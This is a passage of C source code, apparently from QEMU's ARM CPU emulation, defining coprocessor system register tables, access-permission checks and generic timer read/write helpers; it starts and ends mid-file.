offsetof(CPUARMState, cp15.csselr_s), offsetof(CPUARMState, cp15.csselr_ns) } }, /* Auxiliary ID register: this actually has an IMPDEF value but for now * just RAZ for all cores: */ { .name = "AIDR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 1, .crn = 0, .crm = 0, .opc2 = 7, .access = PL1_R, .type = ARM_CP_CONST, .accessfn = access_aa64_tid1, .resetvalue = 0 }, /* Auxiliary fault status registers: these also are IMPDEF, and we * choose to RAZ/WI for all cores. 
*/ { .name = "AFSR0_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 5, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 5, .crm = 1, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, /* MAIR can just read-as-written because we don't implement caches * and so don't need to care about memory attributes. */ { .name = "MAIR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 10, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .fieldoffset = offsetof(CPUARMState, cp15.mair_el[1]), .resetvalue = 0 }, { .name = "MAIR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 10, .crm = 2, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.mair_el[3]), .resetvalue = 0 }, /* For non-long-descriptor page tables these are PRRR and NMRR; * regardless they still act as reads-as-written for QEMU. */ /* MAIR0/1 are defined separately from their 64-bit counterpart which * allows them to assign the correct fieldoffset based on the endianness * handled in the field definitions. */ { .name = "MAIR0", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 10, .crm = 2, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.mair0_s), offsetof(CPUARMState, cp15.mair0_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "MAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 10, .crm = 2, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.mair1_s), offsetof(CPUARMState, cp15.mair1_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "ISR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 12, .crm = 1, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_R, .readfn = isr_read }, /* 32 bit ITLB invalidates */ { .name = "ITLBIALL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 5, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_write }, { .name = "ITLBIMVA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 5, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "ITLBIASID", .cp = 15, .opc1 = 0, .crn = 8, .crm = 5, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiasid_write }, /* 32 bit DTLB invalidates */ { .name = "DTLBIALL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 6, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_write }, { .name = "DTLBIMVA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 6, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "DTLBIASID", .cp = 15, .opc1 = 0, .crn = 8, .crm = 6, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiasid_write }, /* 32 bit TLB invalidates */ { .name = "TLBIALL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_write }, { .name = "TLBIMVA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "TLBIASID", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = 
tlbiasid_write }, { .name = "TLBIMVAA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 3, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_write }, REGINFO_SENTINEL }; static const ARMCPRegInfo v7mp_cp_reginfo[] = { /* 32 bit TLB invalidates, Inner Shareable */ { .name = "TLBIALLIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_is_write }, { .name = "TLBIMVAIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_is_write }, { .name = "TLBIASIDIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiasid_is_write }, { .name = "TLBIMVAAIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 3, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_is_write }, REGINFO_SENTINEL }; static const ARMCPRegInfo pmovsset_cp_reginfo[] = { /* PMOVSSET is not implemented in v7 before v7ve */ { .name = "PMOVSSET", .cp = 15, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 3, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmovsr), .writefn = pmovsset_write, .raw_writefn = raw_write }, { .name = "PMOVSSET_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 14, .opc2 = 3, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmovsr), .writefn = pmovsset_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; static void teecr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= 1; env->teecr = value; } static CPAccessResult teehbr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 0 && (env->teecr & 1)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static const ARMCPRegInfo t2ee_cp_reginfo[] = { { .name = "TEECR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 6, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, teecr), .resetvalue = 0, .writefn = teecr_write }, { .name = "TEEHBR", .cp = 14, .crn = 1, .crm = 0, .opc1 = 6, .opc2 = 0, .access = PL0_RW, .fieldoffset = offsetof(CPUARMState, teehbr), .accessfn = teehbr_access, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo v6k_cp_reginfo[] = { { .name = "TPIDR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 2, .crn = 13, .crm = 0, .access = PL0_RW, .fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[0]), .resetvalue = 0 }, { .name = "TPIDRURW", .cp = 15, .crn = 13, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL0_RW, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tpidrurw_s), offsetoflow32(CPUARMState, cp15.tpidrurw_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "TPIDRRO_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 3, .crn = 13, .crm = 0, .access = PL0_R|PL1_W, .fieldoffset = offsetof(CPUARMState, cp15.tpidrro_el[0]), .resetvalue = 0}, { .name = "TPIDRURO", .cp = 15, .crn = 13, .crm = 0, .opc1 = 0, .opc2 = 3, .access = PL0_R|PL1_W, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tpidruro_s), offsetoflow32(CPUARMState, cp15.tpidruro_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "TPIDR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .opc2 = 4, .crn = 13, .crm = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[1]), 
.resetvalue = 0 }, { .name = "TPIDRPRW", .opc1 = 0, .cp = 15, .crn = 13, .crm = 0, .opc2 = 4, .access = PL1_RW, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tpidrprw_s), offsetoflow32(CPUARMState, cp15.tpidrprw_ns) }, .resetvalue = 0 }, REGINFO_SENTINEL }; static CPAccessResult gt_cntfrq_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* CNTFRQ: not visible from PL0 if both PL0PCTEN and PL0VCTEN are zero. * Writable only at the highest implemented exception level. */ int el = arm_current_el(env); uint64_t hcr; uint32_t cntkctl; switch (el) { case 0: hcr = arm_hcr_el2_eff(env); if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { cntkctl = env->cp15.cnthctl_el2; } else { cntkctl = env->cp15.c14_cntkctl; } if (!extract32(cntkctl, 0, 2)) { return CP_ACCESS_TRAP; } break; case 1: if (!isread && ri->state == ARM_CP_STATE_AA32 && arm_is_secure_below_el3(env)) { /* Accesses from 32-bit Secure EL1 UNDEF (*not* trap to EL3!) */ return CP_ACCESS_TRAP_UNCATEGORIZED; } break; case 2: case 3: break; } if (!isread && el < arm_highest_el(env)) { return CP_ACCESS_TRAP_UNCATEGORIZED; } return CP_ACCESS_OK; } static CPAccessResult gt_counter_access(CPUARMState *env, int timeridx, bool isread) { unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); uint64_t hcr = arm_hcr_el2_eff(env); switch (cur_el) { case 0: /* If HCR_EL2.<E2H,TGE> == '11': check CNTHCTL_EL2.EL0[PV]CTEN. */ if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { return (extract32(env->cp15.cnthctl_el2, timeridx, 1) ? CP_ACCESS_OK : CP_ACCESS_TRAP_EL2); } /* CNT[PV]CT: not visible from PL0 if EL0[PV]CTEN is zero */ if (!extract32(env->cp15.c14_cntkctl, timeridx, 1)) { return CP_ACCESS_TRAP; } /* If HCR_EL2.<E2H,TGE> == '10': check CNTHCTL_EL2.EL1PCTEN. */ if (hcr & HCR_E2H) { if (timeridx == GTIMER_PHYS && !extract32(env->cp15.cnthctl_el2, 10, 1)) { return CP_ACCESS_TRAP_EL2; } } else { /* If HCR_EL2.<E2H> == 0: check CNTHCTL_EL2.EL1PCEN. */ if (arm_feature(env, ARM_FEATURE_EL2) && timeridx == GTIMER_PHYS && !secure && !extract32(env->cp15.cnthctl_el2, 1, 1)) { return CP_ACCESS_TRAP_EL2; } } break; case 1: /* Check CNTHCTL_EL2.EL1PCTEN, which changes location based on E2H. */ if (arm_feature(env, ARM_FEATURE_EL2) && timeridx == GTIMER_PHYS && !secure && (hcr & HCR_E2H ? !extract32(env->cp15.cnthctl_el2, 10, 1) : !extract32(env->cp15.cnthctl_el2, 0, 1))) { return CP_ACCESS_TRAP_EL2; } break; } return CP_ACCESS_OK; } static CPAccessResult gt_timer_access(CPUARMState *env, int timeridx, bool isread) { unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); uint64_t hcr = arm_hcr_el2_eff(env); switch (cur_el) { case 0: if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { /* If HCR_EL2.<E2H,TGE> == '11': check CNTHCTL_EL2.EL0[PV]TEN. */ return (extract32(env->cp15.cnthctl_el2, 9 - timeridx, 1) ? CP_ACCESS_OK : CP_ACCESS_TRAP_EL2); } /* * CNT[PV]_CVAL, CNT[PV]_CTL, CNT[PV]_TVAL: not visible from * EL0 if EL0[PV]TEN is zero. */ if (!extract32(env->cp15.c14_cntkctl, 9 - timeridx, 1)) { return CP_ACCESS_TRAP; } /* fall through */ case 1: if (arm_feature(env, ARM_FEATURE_EL2) && timeridx == GTIMER_PHYS && !secure) { if (hcr & HCR_E2H) { /* If HCR_EL2.<E2H,TGE> == '10': check CNTHCTL_EL2.EL1PTEN. */ if (!extract32(env->cp15.cnthctl_el2, 11, 1)) { return CP_ACCESS_TRAP_EL2; } } else { /* If HCR_EL2.<E2H> == 0: check CNTHCTL_EL2.EL1PCEN. 
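* (With E2H the EL1 physical timer trap control moves from CNTHCTL_EL2 bit 1 (EL1PCEN) up to bit 11 (EL1PTEN), which is why the two branches test different extract32() bit positions.)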
*/ if (!extract32(env->cp15.cnthctl_el2, 1, 1)) { return CP_ACCESS_TRAP_EL2; } } } break; } return CP_ACCESS_OK; } static CPAccessResult gt_pct_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_counter_access(env, GTIMER_PHYS, isread); } static CPAccessResult gt_vct_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_counter_access(env, GTIMER_VIRT, isread); } static CPAccessResult gt_ptimer_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_timer_access(env, GTIMER_PHYS, isread); } static CPAccessResult gt_vtimer_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_timer_access(env, GTIMER_VIRT, isread); } static CPAccessResult gt_stimer_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* The AArch64 register view of the secure physical timer is * always accessible from EL3, and configurably accessible from * Secure EL1. */ switch (arm_current_el(env)) { case 1: if (!arm_is_secure(env)) { return CP_ACCESS_TRAP; } if (!(env->cp15.scr_el3 & SCR_ST)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; case 0: case 2: return CP_ACCESS_TRAP; case 3: return CP_ACCESS_OK; default: g_assert_not_reached(); /* never reach here */ return CP_ACCESS_OK; } } static uint64_t gt_get_countervalue(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); return qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / gt_cntfrq_period_ns(cpu); } static void gt_recalc_timer(ARMCPU *cpu, int timeridx) { #if 0 ARMGenericTimer *gt = &cpu->env.cp15.c14_timer[timeridx]; if (gt->ctl & 1) { /* Timer enabled: calculate and set current ISTATUS, irq, and * reset timer to when ISTATUS next has to change */ uint64_t offset = timeridx == GTIMER_VIRT ? cpu->env.cp15.cntvoff_el2 : 0; uint64_t count = gt_get_countervalue(&cpu->env); /* Note that this must be unsigned 64 bit arithmetic: */ int istatus = count - offset >= gt->cval; uint64_t nexttick; int irqstate; gt->ctl = deposit32(gt->ctl, 2, 1, istatus); irqstate = (istatus && !(gt->ctl & 2)); qemu_set_irq(cpu->gt_timer_outputs[timeridx], irqstate); if (istatus) { /* Next transition is when count rolls back over to zero */ nexttick = UINT64_MAX; } else { /* Next transition is when we hit cval */ nexttick = gt->cval + offset; } /* Note that the desired next expiry time might be beyond the * signed-64-bit range of a QEMUTimer -- in this case we just * set the timer for as far in the future as possible. When the * timer expires we will reset the timer for any remaining period.
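* The guard below avoids overflow: once nexttick exceeds INT64_MAX / gt_cntfrq_period_ns(cpu), converting ticks to nanoseconds would no longer fit in a signed 64-bit value, so we just program the timer with INT64_MAX.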
*/ if (nexttick > INT64_MAX / gt_cntfrq_period_ns(cpu)) { timer_mod_ns(cpu->gt_timer[timeridx], INT64_MAX); } else { timer_mod(cpu->gt_timer[timeridx], nexttick); } trace_arm_gt_recalc(timeridx, irqstate, nexttick); } else { /* Timer disabled: ISTATUS and timer output always clear */ gt->ctl &= ~4; qemu_set_irq(cpu->gt_timer_outputs[timeridx], 0); timer_del(cpu->gt_timer[timeridx]); trace_arm_gt_recalc_disabled(timeridx); } #endif } static void gt_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx) { #if 0 ARMCPU *cpu = env_archcpu(env); timer_del(cpu->gt_timer[timeridx]); #endif } static uint64_t gt_cnt_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_get_countervalue(env); } static uint64_t gt_virt_cnt_offset(CPUARMState *env) { uint64_t hcr; switch (arm_current_el(env)) { case 2: hcr = arm_hcr_el2_eff(env); if (hcr & HCR_E2H) { return 0; } break; case 0: hcr = arm_hcr_el2_eff(env); if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { return 0; } break; } return env->cp15.cntvoff_el2; } static uint64_t gt_virt_cnt_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_get_countervalue(env) - gt_virt_cnt_offset(env); } static void gt_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx, uint64_t value) { #if 0 trace_arm_gt_cval_write(timeridx, value); env->cp15.c14_timer[timeridx].cval = value; gt_recalc_timer(env_archcpu(env), timeridx); #endif } static uint64_t gt_tval_read(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx) { uint64_t offset = 0; switch (timeridx) { case GTIMER_VIRT: case GTIMER_HYPVIRT: offset = gt_virt_cnt_offset(env); break; } return (uint32_t)(env->cp15.c14_timer[timeridx].cval - (gt_get_countervalue(env) - offset)); } static void gt_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx, uint64_t value) { uint64_t offset = 0; switch (timeridx) { case GTIMER_VIRT: case GTIMER_HYPVIRT: offset = gt_virt_cnt_offset(env); break; } env->cp15.c14_timer[timeridx].cval = gt_get_countervalue(env) - offset + sextract64(value, 0, 32); gt_recalc_timer(env_archcpu(env), timeridx); } static void gt_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx, uint64_t value) { #if 0 ARMCPU *cpu = env_archcpu(env); uint32_t oldval = env->cp15.c14_timer[timeridx].ctl; env->cp15.c14_timer[timeridx].ctl = deposit64(oldval, 0, 2, value); if ((oldval ^ value) & 1) { /* Enable toggled */ gt_recalc_timer(cpu, timeridx); } else if ((oldval ^ value) & 2) { /* IMASK toggled: don't need to recalculate, * just set the interrupt line based on ISTATUS */ int irqstate = (oldval & 4) && !(value & 2); qemu_set_irq(cpu->gt_timer_outputs[timeridx], irqstate); } #endif } static void gt_phys_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_PHYS); } static void gt_phys_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_PHYS, value); } static uint64_t gt_phys_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_PHYS); } static void gt_phys_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_PHYS, value); } static void gt_phys_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_PHYS, value); } static int gt_phys_redir_timeridx(CPUARMState *env) { switch (arm_mmu_idx(env)) { case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: return GTIMER_HYP; default: return GTIMER_PHYS; } } static int 
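/* Same redirection as gt_phys_redir_timeridx() above, but for the virtual timer: in an E2&0 (HCR_EL2.E2H) translation regime the guest's CNTV_* registers target the EL2 virtual timer (GTIMER_HYPVIRT) instead of GTIMER_VIRT. */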
gt_virt_redir_timeridx(CPUARMState *env) { switch (arm_mmu_idx(env)) { case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: return GTIMER_HYPVIRT; default: return GTIMER_VIRT; } } static uint64_t gt_phys_redir_cval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_phys_redir_timeridx(env); return env->cp15.c14_timer[timeridx].cval; } static void gt_phys_redir_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_phys_redir_timeridx(env); gt_cval_write(env, ri, timeridx, value); } static uint64_t gt_phys_redir_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_phys_redir_timeridx(env); return gt_tval_read(env, ri, timeridx); } static void gt_phys_redir_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_phys_redir_timeridx(env); gt_tval_write(env, ri, timeridx, value); } static uint64_t gt_phys_redir_ctl_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_phys_redir_timeridx(env); return env->cp15.c14_timer[timeridx].ctl; } static void gt_phys_redir_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_phys_redir_timeridx(env); gt_ctl_write(env, ri, timeridx, value); } static void gt_virt_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_VIRT); } static void gt_virt_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_VIRT, value); } static uint64_t gt_virt_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_VIRT); } static void gt_virt_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_VIRT, value); } static void gt_virt_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_VIRT, value); } static void gt_cntvoff_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); raw_write(env, ri, value); gt_recalc_timer(cpu, GTIMER_VIRT); } static uint64_t gt_virt_redir_cval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_virt_redir_timeridx(env); return env->cp15.c14_timer[timeridx].cval; } static void gt_virt_redir_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_virt_redir_timeridx(env); gt_cval_write(env, ri, timeridx, value); } static uint64_t gt_virt_redir_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_virt_redir_timeridx(env); return gt_tval_read(env, ri, timeridx); } static void gt_virt_redir_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_virt_redir_timeridx(env); gt_tval_write(env, ri, timeridx, value); } static uint64_t gt_virt_redir_ctl_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_virt_redir_timeridx(env); return env->cp15.c14_timer[timeridx].ctl; } static void gt_virt_redir_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_virt_redir_timeridx(env); gt_ctl_write(env, ri, timeridx, value); } static void gt_hyp_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_HYP); } static void gt_hyp_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_HYP, value); } static uint64_t gt_hyp_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_HYP); } static void 
gt_hyp_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_HYP, value); } static void gt_hyp_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_HYP, value); } static void gt_sec_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_SEC); } static void gt_sec_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_SEC, value); } static uint64_t gt_sec_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_SEC); } static void gt_sec_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_SEC, value); } static void gt_sec_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_SEC, value); } static void gt_hv_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_HYPVIRT); } static void gt_hv_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_HYPVIRT, value); } static uint64_t gt_hv_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_HYPVIRT); } static void gt_hv_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_HYPVIRT, value); } static void gt_hv_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_HYPVIRT, value); } void arm_gt_ptimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_PHYS); } void arm_gt_vtimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_VIRT); } void arm_gt_htimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_HYP); } void arm_gt_stimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_SEC); } void arm_gt_hvtimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_HYPVIRT); } static void arm_gt_cntfrq_reset(CPUARMState *env, const ARMCPRegInfo *opaque) { ARMCPU *cpu = env_archcpu(env); cpu->env.cp15.c14_cntfrq = cpu->gt_cntfrq_hz; } static const ARMCPRegInfo generic_timer_cp_reginfo[] = { /* Note that CNTFRQ is purely reads-as-written for the benefit * of software; writing it doesn't actually change the timer frequency. * Our reset value matches the fixed frequency we implement the timer at. 
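* (arm_gt_cntfrq_reset() above implements this by copying cpu->gt_cntfrq_hz straight into CNTFRQ.)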
*/ { .name = "CNTFRQ", .cp = 15, .crn = 14, .crm = 0, .opc1 = 0, .opc2 = 0, .type = ARM_CP_ALIAS, .access = PL1_RW | PL0_R, .accessfn = gt_cntfrq_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_cntfrq), }, { .name = "CNTFRQ_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 0, .opc2 = 0, .access = PL1_RW | PL0_R, .accessfn = gt_cntfrq_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_cntfrq), .resetfn = arm_gt_cntfrq_reset, }, /* overall control: mostly access permissions */ { .name = "CNTKCTL", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 14, .crm = 1, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c14_cntkctl), .resetvalue = 0, }, /* per-timer control */ { .name = "CNTP_CTL", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 1, .secure = ARM_CP_SECSTATE_NS, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL0_RW, .accessfn = gt_ptimer_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), .readfn = gt_phys_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTP_CTL_S", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 1, .secure = ARM_CP_SECSTATE_S, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL0_RW, .accessfn = gt_ptimer_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_SEC].ctl), .writefn = gt_sec_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTP_CTL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 2, .opc2 = 1, .type = ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), .resetvalue = 0, .readfn = gt_phys_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTV_CTL", .cp = 15, .crn = 14, .crm = 3, .opc1 = 0, .opc2 = 1, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL0_RW, .accessfn = gt_vtimer_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), .readfn = gt_virt_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTV_CTL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 3, .opc2 = 1, .type = ARM_CP_IO, .access = PL0_RW, .accessfn = gt_vtimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), .resetvalue = 0, .readfn = gt_virt_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_ctl_write, .raw_writefn = raw_write, }, /* TimerValue views: a 32 bit 